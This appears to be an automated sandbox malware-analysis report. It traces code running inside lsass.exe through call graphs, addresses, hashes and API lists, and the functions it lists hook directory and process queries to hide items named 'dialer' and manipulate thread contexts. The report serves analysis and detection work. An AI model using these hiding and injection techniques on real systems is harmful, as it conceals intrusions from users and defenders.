calls 9238->9241 9239->9190 9240->9238 9241->9239 9242 2d6f151de13 GetLastError 9244 2d6f151da50 11 API calls 9242->9244 9243 2d6f151de50 9243->9239 9248 2d6f151f53c WideCharToMultiByte 9243->9248 9245 2d6f151de20 9244->9245 9249 2d6f151dadc __free_lconv_mon 11 API calls 9245->9249 9246 2d6f151de44 9251 2d6f151ce3c 12 API calls 9246->9251 9247->9242 9247->9243 9247->9246 9250 2d6f151db74 __free_lconv_mon 11 API calls 9247->9250 9252 2d6f151de9c 9248->9252 9249->9239 9250->9246 9251->9243 9252->9239 9252->9242 9254 2d6f151d3d0 __free_lconv_mon 11 API calls 9253->9254 9255 2d6f151da5d __free_lconv_mon 9254->9255 9256 2d6f151d3d0 __free_lconv_mon 11 API calls 9255->9256 9257 2d6f151da7f 9256->9257 9257->9229 8083 2d6f1517f4c 8084 2d6f1517f70 __scrt_release_startup_lock 8083->8084 8085 2d6f151bd15 8084->8085 8086 2d6f151d3d0 __free_lconv_mon 11 API calls 8084->8086 8087 2d6f151bd3e 8086->8087 9258 2d6f1521ed0 9259 2d6f151f0c0 69 API calls 9258->9259 9260 2d6f1521ed9 9259->9260 9261 2d6f15250cf 9262 2d6f15250e7 9261->9262 9268 2d6f1525152 9261->9268 9263 2d6f1519a64 _CreateFrameInfo 9 API calls 9262->9263 9262->9268 9264 2d6f1525134 9263->9264 9265 2d6f1519a64 _CreateFrameInfo 9 API calls 9264->9265 9266 2d6f1525149 9265->9266 9267 2d6f151cad8 23 API calls 9266->9267 9267->9268 8479 2d6f151b7d4 8485 2d6f151b707 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8479->8485 8480 2d6f151b7fb 8481 2d6f1519a64 _CreateFrameInfo 9 API calls 8480->8481 8482 2d6f151b800 8481->8482 8483 2d6f1519a64 _CreateFrameInfo 9 API calls 8482->8483 8484 2d6f151b80b __FrameHandler3::GetHandlerSearchState 8482->8484 8483->8484 8485->8480 8485->8484 8486 2d6f151a114 9 API calls Is_bad_exception_allowed 8485->8486 8487 2d6f151a13c __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8485->8487 8486->8485 8487->8485 9269 2d6f15160d3 9270 2d6f15160e0 9269->9270 9271 2d6f15160ec GetThreadContext 9270->9271 9272 2d6f151624a 9270->9272 9271->9272 9273 2d6f1516112 9271->9273 9275 2d6f151632e 9272->9275 9276 2d6f1516271 VirtualProtect FlushInstructionCache 9272->9276 9273->9272 9278 2d6f1516139 9273->9278 9274 2d6f15161bd 9277 2d6f151634e 9275->9277 9280 2d6f1514810 VirtualFree 9275->9280 9276->9272 9279 2d6f1515220 3 API calls 9277->9279 9278->9274 9281 2d6f1516196 SetThreadContext 9278->9281 9284 2d6f1516353 9279->9284 9280->9277 9281->9274 9282 2d6f15163a7 9285 2d6f1517d70 _log10_special 8 API calls 9282->9285 9283 2d6f1516367 ResumeThread 9283->9284 9284->9282 9284->9283 9286 2d6f15163ef 9285->9286 9287 2d6f15218d3 9288 2d6f15218e0 9287->9288 9289 2d6f15218f5 9288->9289 9290 2d6f152190e 9288->9290 9291 2d6f151dadc __free_lconv_mon 11 API calls 9289->9291 9293 2d6f151e5e4 23 API calls 9290->9293 9295 2d6f1521905 9290->9295 9292 2d6f15218fa 9291->9292 9294 2d6f151d9a0 _invalid_parameter_noinfo 49 API calls 9292->9294 9293->9295 9294->9295 8488 2d6f15207b8 8489 2d6f15207c3 8488->8489 8497 2d6f15230b8 8489->8497 8510 2d6f151cdcc EnterCriticalSection 8497->8510 8511 2d6f151c9bc 8512 2d6f151c9ed 8511->8512 8513 2d6f151c9d5 8511->8513 8513->8512 8514 2d6f151db74 __free_lconv_mon 11 API calls 8513->8514 8514->8512 9296 2d6f151febc 9297 2d6f151fec8 9296->9297 9299 2d6f151feef 9297->9299 9300 2d6f15220ec 9297->9300 9301 2d6f15220f1 9300->9301 9305 2d6f152212c 9300->9305 9302 2d6f1522124 9301->9302 9303 2d6f1522112 DeleteCriticalSection 9301->9303 9304 2d6f151db74 __free_lconv_mon 11 API calls 9302->9304 9303->9302 9303->9303 9304->9305 9305->9297 9306 2d6f15130bc 9307 2d6f15130ec 9306->9307 9308 2d6f15131a5 9307->9308 9309 2d6f1513109 PdhGetCounterInfoW 9307->9309 9309->9308 9310 2d6f1513127 GetProcessHeap HeapAlloc PdhGetCounterInfoW 9309->9310 9311 2d6f1513159 StrCmpW 9310->9311 9312 2d6f1513191 GetProcessHeap HeapFree 9310->9312 9311->9312 9314 2d6f151316e 9311->9314 9312->9308 9313 2d6f1513554 12 API calls 9313->9314 9314->9312 9314->9313 9315 2d6f1515cbc 9316 2d6f1515cc3 9315->9316 9317 2d6f1515cf0 VirtualProtect 9316->9317 9319 2d6f1515c00 9316->9319 9318 2d6f1515d19 GetLastError 9317->9318 9317->9319 9318->9319 8088 2d6f151b53e 8089 2d6f1519a64 _CreateFrameInfo 9 API calls 8088->8089 8091 2d6f151b54b __CxxCallCatchBlock 8089->8091 8090 2d6f151b58f RaiseException 8092 2d6f151b5b6 8090->8092 8091->8090 8101 2d6f151a0c0 8092->8101 8094 2d6f151b5e7 __CxxCallCatchBlock 8095 2d6f1519a64 _CreateFrameInfo 9 API calls 8094->8095 8096 2d6f151b5fa 8095->8096 8097 2d6f1519a64 _CreateFrameInfo 9 API calls 8096->8097 8100 2d6f151b603 8097->8100 8102 2d6f1519a64 _CreateFrameInfo 9 API calls 8101->8102 8103 2d6f151a0d2 8102->8103 8104 2d6f1519a64 _CreateFrameInfo 9 API calls 8103->8104 8106 2d6f151a10d 8103->8106 8105 2d6f151a0dd 8104->8105 8105->8106 8107 2d6f1519a64 _CreateFrameInfo 9 API calls 8105->8107 8108 2d6f151a0fe 8107->8108 8108->8094 8109 2d6f1519750 8108->8109 8110 2d6f1519a64 _CreateFrameInfo 9 API calls 8109->8110 8111 2d6f151975e 8110->8111 8111->8094 9320 2d6f1517ec0 9321 2d6f1517ec9 __scrt_release_startup_lock 9320->9321 9323 2d6f1517ecd 9321->9323 9324 2d6f151c38c 9321->9324 9325 2d6f151c3ac 9324->9325 9326 2d6f151c3c3 9324->9326 9327 2d6f151c3ca 9325->9327 9328 2d6f151c3b4 9325->9328 9326->9323 9329 2d6f151f0c0 69 API calls 9327->9329 9330 2d6f151dadc __free_lconv_mon 11 API calls 9328->9330 9331 2d6f151c3cf 9329->9331 9332 2d6f151c3b9 9330->9332 9355 2d6f151e7a4 GetModuleFileNameW 9331->9355 9334 2d6f151d9a0 _invalid_parameter_noinfo 49 API calls 9332->9334 9334->9326 9338 2d6f151c32c 11 API calls 9339 2d6f151c439 9338->9339 9340 2d6f151c459 9339->9340 9341 2d6f151c441 9339->9341 9342 2d6f151c164 23 API calls 9340->9342 9343 2d6f151dadc __free_lconv_mon 11 API calls 9341->9343 9348 2d6f151c475 9342->9348 9344 2d6f151c446 9343->9344 9345 2d6f151db74 __free_lconv_mon 11 API calls 9344->9345 9345->9326 9346 2d6f151c47b 9347 2d6f151db74 __free_lconv_mon 11 API calls 9346->9347 9347->9326 9348->9346 9349 2d6f151c4a7 9348->9349 9350 2d6f151c4c0 9348->9350 9351 2d6f151db74 __free_lconv_mon 11 API calls 9349->9351 9352 2d6f151db74 __free_lconv_mon 11 API calls 9350->9352 9353 2d6f151c4b0 9351->9353 9352->9346 9354 2d6f151db74 __free_lconv_mon 11 API calls 9353->9354 9354->9326 9356 2d6f151e7e9 GetLastError 9355->9356 9357 2d6f151e7fd 9355->9357 9359 2d6f151da50 11 API calls 9356->9359 9358 2d6f151e5e4 23 API calls 9357->9358 9360 2d6f151e82b 9358->9360 9361 2d6f151e7f6 9359->9361 9363 2d6f151f9d8 5 API calls 9360->9363 9366 2d6f151e83c 9360->9366 9362 2d6f1517d70 _log10_special 8 API calls 9361->9362 9364 2d6f151c3e6 9362->9364 9363->9366 9367 2d6f151c164 9364->9367 9373 2d6f151e688 9366->9373 9369 2d6f151c1a2 9367->9369 9371 2d6f151c20e 9369->9371 9387 2d6f151f470 9369->9387 9370 2d6f151c2ff 9370->9338 9371->9370 9372 2d6f151f470 23 API calls 9371->9372 9372->9371 9374 2d6f151e6c7 9373->9374 9377 2d6f151e6ac 9373->9377 9375 2d6f151e6cc 9374->9375 9376 2d6f151f53c WideCharToMultiByte 9374->9376 9375->9377 9380 2d6f151dadc __free_lconv_mon 11 API calls 9375->9380 9379 2d6f151e723 9376->9379 9377->9361 9378 2d6f151e72a GetLastError 9381 2d6f151da50 11 API calls 9378->9381 9379->9375 9379->9378 9382 2d6f151e755 9379->9382 9380->9377 9383 2d6f151e737 9381->9383 9384 2d6f151f53c WideCharToMultiByte 9382->9384 9385 2d6f151dadc __free_lconv_mon 11 API calls 9383->9385 9386 2d6f151e77c 9384->9386 9385->9377 9386->9377 9386->9378 9388 2d6f151f3fc 9387->9388 9389 2d6f151e5e4 23 API calls 9388->9389 9390 2d6f151f420 9389->9390 9390->9369 8781 2d6f151b444 8782 2d6f1519a64 _CreateFrameInfo 9 API calls 8781->8782 8783 2d6f151b479 8782->8783 8784 2d6f1519a64 _CreateFrameInfo 9 API calls 8783->8784 8785 2d6f151b487 __except_validate_context_record 8784->8785 8786 2d6f1519a64 _CreateFrameInfo 9 API calls 8785->8786 8787 2d6f151b4cb 8786->8787 8788 2d6f1519a64 _CreateFrameInfo 9 API calls 8787->8788 8789 2d6f151b4d4 8788->8789 8790 2d6f1519a64 _CreateFrameInfo 9 API calls 8789->8790 8791 2d6f151b4dd 8790->8791 8804 2d6f151a084 8791->8804 8794 2d6f1519a64 _CreateFrameInfo 9 API calls 8795 2d6f151b50d __CxxCallCatchBlock 8794->8795 8796 2d6f151a0c0 __CxxCallCatchBlock 9 API calls 8795->8796 8801 2d6f151b5be 8796->8801 8797 2d6f151b5e7 __CxxCallCatchBlock 8798 2d6f1519a64 _CreateFrameInfo 9 API calls 8797->8798 8799 2d6f151b5fa 8798->8799 8800 2d6f1519a64 _CreateFrameInfo 9 API calls 8799->8800 8803 2d6f151b603 8800->8803 8801->8797 8802 2d6f1519750 __CxxCallCatchBlock 9 API calls 8801->8802 8802->8797 8805 2d6f1519a64 _CreateFrameInfo 9 API calls 8804->8805 8806 2d6f151a095 8805->8806 8807 2d6f1519a64 _CreateFrameInfo 9 API calls 8806->8807 8808 2d6f151a0a0 8806->8808 8807->8808 8809 2d6f1519a64 _CreateFrameInfo 9 API calls 8808->8809 8810 2d6f151a0b1 8809->8810 8810->8794 8810->8795 9391 2d6f15128c4 9393 2d6f151290a 9391->9393 9392 2d6f1512970 9393->9392 9394 2d6f1513c74 StrCmpNIW 9393->9394 9394->9393

                                                          Executed Functions

                                                          Function 000002D6F1512604 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5 2d6f1512604-2d6f1512688 NtQueryDirectoryFileEx 6 2d6f151268e-2d6f1512691 5->6 7 2d6f15128a0-2d6f15128c3 5->7 6->7 8 2d6f1512697-2d6f15126a5 6->8 8->7 9 2d6f15126ab-2d6f15126f1 call 2d6f1519090 * 3 GetFileType 8->9 16 2d6f1512709-2d6f1512713 call 2d6f15119d8 9->16 17 2d6f15126f3-2d6f1512707 StrCpyW 9->17 18 2d6f1512718-2d6f151271c 16->18 17->18 20 2d6f15127c7-2d6f15127cc 18->20 21 2d6f1512722-2d6f151273b call 2d6f1513370 call 2d6f1513c74 18->21 22 2d6f15127cf-2d6f15127d4 20->22 34 2d6f151273d-2d6f151276c call 2d6f1513370 call 2d6f151330c call 2d6f1511cd8 21->34 35 2d6f1512772-2d6f15127bc 21->35 24 2d6f15127d6-2d6f15127d9 22->24 25 2d6f15127f1 22->25 24->25 27 2d6f15127db-2d6f15127de 24->27 29 2d6f15127f4-2d6f151280d call 2d6f1513370 call 2d6f1513c74 25->29 27->25 30 2d6f15127e0-2d6f15127e3 27->30 44 2d6f151284f-2d6f1512851 29->44 45 2d6f151280f-2d6f151283e call 2d6f1513370 call 2d6f151330c call 2d6f1511cd8 29->45 30->25 33 2d6f15127e5-2d6f15127e8 30->33 33->25 37 2d6f15127ea-2d6f15127ef 33->37 34->7 34->35 35->7 46 2d6f15127c2 35->46 37->25 37->29 47 2d6f1512853-2d6f151286d 44->47 48 2d6f1512872-2d6f1512875 44->48 45->44 65 2d6f1512840-2d6f151284b 45->65 46->21 47->22 51 2d6f1512877-2d6f151287d 48->51 52 2d6f151287f-2d6f1512882 48->52 51->7 56 2d6f151289d 52->56 57 2d6f1512884-2d6f1512887 52->57 56->7 57->56 60 2d6f1512889-2d6f151288c 57->60 60->56 62 2d6f151288e-2d6f1512891 60->62 62->56 64 2d6f1512893-2d6f1512896 62->64 64->56 66 2d6f1512898-2d6f151289b 64->66 65->7 67 2d6f151284d 65->67 66->7 66->56 67->22
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryQueryType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 4175507832-91387939
                                                          • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                          • Instruction ID: a7a2f4b86567ddabb2164e3d737f1ab75e8ae98fca2c710c464a591d530f4088
                                                          • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                          • Instruction Fuzzy Hash: 777180A6204F814AEB669F26B85C3AA6790F7857C4F64001BED0F67F99DE38CE05C740
                                                          Function 000002D6F151211C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 68 2d6f151211c-2d6f1512156 NtQuerySystemInformation 69 2d6f1512158-2d6f151215c 68->69 70 2d6f151215f-2d6f1512162 68->70 69->70 71 2d6f1512168-2d6f151216b 70->71 72 2d6f1512313-2d6f1512333 70->72 73 2d6f1512171-2d6f1512183 71->73 74 2d6f1512263-2d6f1512266 71->74 73->72 77 2d6f1512189-2d6f1512195 73->77 75 2d6f15122d7-2d6f15122da 74->75 76 2d6f1512268-2d6f1512282 call 2d6f15131cc 74->76 75->72 81 2d6f15122dc-2d6f15122ef call 2d6f15131cc 75->81 76->72 89 2d6f1512288-2d6f151229e 76->89 79 2d6f1512197-2d6f15121a7 77->79 80 2d6f15121c3-2d6f15121ce call 2d6f1511bc8 77->80 79->80 85 2d6f15121a9-2d6f15121c1 StrCmpNIW 79->85 86 2d6f15121ef-2d6f1512201 80->86 91 2d6f15121d0-2d6f15121e8 call 2d6f1511c34 80->91 81->72 90 2d6f15122f1-2d6f15122f9 81->90 85->80 85->86 92 2d6f1512211-2d6f1512213 86->92 93 2d6f1512203-2d6f1512205 86->93 89->72 94 2d6f15122a0-2d6f15122bc 89->94 90->72 95 2d6f15122fb-2d6f1512303 90->95 91->86 106 2d6f15121ea-2d6f15121ed 91->106 99 2d6f151221a 92->99 100 2d6f1512215-2d6f1512218 92->100 97 2d6f1512207-2d6f151220a 93->97 98 2d6f151220c-2d6f151220f 93->98 101 2d6f15122c0-2d6f15122d3 94->101 102 2d6f1512306-2d6f1512311 95->102 104 2d6f151221d-2d6f1512220 97->104 98->104 99->104 100->104 101->101 105 2d6f15122d5 101->105 102->72 102->102 107 2d6f151222e-2d6f1512231 104->107 108 2d6f1512222-2d6f1512228 104->108 105->72 106->104 107->72 109 2d6f1512237-2d6f151223b 107->109 108->77 108->107 110 2d6f151223d-2d6f1512240 109->110 111 2d6f1512252-2d6f151225e 109->111 110->72 112 2d6f1512246-2d6f151224b 110->112 111->72 112->109 113 2d6f151224d 112->113 113->72
                                                          APIs
                                                          • NtQuerySystemInformation.NTDLL ref: 000002D6F1512147
                                                          • StrCmpNIW.SHLWAPI ref: 000002D6F15121B6
                                                            • Part of subcall function 000002D6F15131CC: GetProcessHeap.KERNEL32(?,?,?,?,?,000002D6F15122ED), ref: 000002D6F15131EF
                                                            • Part of subcall function 000002D6F15131CC: HeapAlloc.KERNEL32(?,?,?,?,?,000002D6F15122ED), ref: 000002D6F1513202
                                                            • Part of subcall function 000002D6F15131CC: StrCmpNIW.SHLWAPI(?,?,?,?,?,000002D6F15122ED), ref: 000002D6F1513277
                                                            • Part of subcall function 000002D6F15131CC: GetProcessHeap.KERNEL32(?,?,?,?,?,000002D6F15122ED), ref: 000002D6F15132DD
                                                            • Part of subcall function 000002D6F15131CC: HeapFree.KERNEL32(?,?,?,?,?,000002D6F15122ED), ref: 000002D6F15132EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                          • String ID: S$dialer
                                                          • API String ID: 722747020-3873981283
                                                          • Opcode ID: 6a3425f5eaa1fa7964d7839e93a7c40b0f2b076159b3436a422c3db3c6fc66b9
                                                          • Instruction ID: b1aa162197449f89dcd7425857e4e44c2aeade2372b5389528f94c864bfbd257
                                                          • Opcode Fuzzy Hash: 6a3425f5eaa1fa7964d7839e93a7c40b0f2b076159b3436a422c3db3c6fc66b9
                                                          • Instruction Fuzzy Hash: F1517DB2B10E248AEB62CF26A84C6AD63A5F7047D4F25841ADE5E63F48DB38CC51C740
                                                          Function 000002D6F15119D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction ID: d8c3b55f1581f15655857fc0674f79bf9864d6f485298729ae04c5ad62850c3b
                                                          • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction Fuzzy Hash: E3F03CA3304AC19AEB208F21F5DC7596760F754BD8F884022DA4E46D54DEBCDE88CB00
                                                          Function 000002D6F1513620 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 000002D6F1513639
                                                          • PathFindFileNameW.SHLWAPI ref: 000002D6F1513648
                                                            • Part of subcall function 000002D6F1513C74: StrCmpNIW.KERNELBASE(?,?,?,000002D6F151254B), ref: 000002D6F1513C8C
                                                            • Part of subcall function 000002D6F1513BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002D6F151365F), ref: 000002D6F1513BCE
                                                            • Part of subcall function 000002D6F1513BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002D6F151365F), ref: 000002D6F1513BFC
                                                            • Part of subcall function 000002D6F1513BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002D6F151365F), ref: 000002D6F1513C1E
                                                            • Part of subcall function 000002D6F1513BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002D6F151365F), ref: 000002D6F1513C39
                                                            • Part of subcall function 000002D6F1513BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002D6F151365F), ref: 000002D6F1513C5A
                                                          • CreateThread.KERNELBASE ref: 000002D6F151368F
                                                            • Part of subcall function 000002D6F1511D40: GetCurrentThread.KERNEL32 ref: 000002D6F1511D4B
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0
                                                          • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction ID: 73d54663c895a4f2150cf828e964c136c77ad552aa7f349c4b341c67237fb721
                                                          • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction Fuzzy Hash: 0C1152F1610E418DFBA2AF20B46D3592691B7543E5F504927990F91E95EF7CCC098A00
                                                          Function 000002D6F1513C74 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 132 2d6f1513c74-2d6f1513c7f 133 2d6f1513c99-2d6f1513ca0 132->133 134 2d6f1513c81-2d6f1513c94 StrCmpNIW 132->134 134->133 135 2d6f1513c96 134->135 135->133
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dialer
                                                          • API String ID: 0-3528709123
                                                          • Opcode ID: 97321a65610e08eab14ba81d351fc46d427cdee9015788b38818b6b16ac0c562
                                                          • Instruction ID: 33ea1c5c4b75a750e3aa84d3109a535aad3ef99273fbd9bc3119f1c8eacba178
                                                          • Opcode Fuzzy Hash: 97321a65610e08eab14ba81d351fc46d427cdee9015788b38818b6b16ac0c562
                                                          • Instruction Fuzzy Hash: D0D0A7E2311E868EFF65DFA2E8DC6A02350EF14798F884022CD0A02910E71D8D8D8710
                                                          Function 000002D6F14E2AC0 Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction ID: d1ad120bac2b9df70661f136652211b2a5dd1fa2e4f7da9c8a8aa6ee51d77075
                                                          • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction Fuzzy Hash: 7491E372B01A608BEB64CF19E04CF697391F794BE4F58812A9F4B17B88DA39DD12C740
                                                          Function 000002D6F1511AC8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 000002D6F1511628: GetProcessHeap.KERNEL32 ref: 000002D6F1511633
                                                            • Part of subcall function 000002D6F1511628: HeapAlloc.KERNEL32 ref: 000002D6F1511642
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F15116B2
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F15116DF
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15116F9
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511719
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F1511734
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511754
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F151176F
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F151178F
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15117AA
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F15117CA
                                                          • SleepEx.KERNELBASE ref: 000002D6F1511AE3
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15117E5
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511805
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F1511820
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511840
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F151185B
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F151187B
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F1511896
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15118A0
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
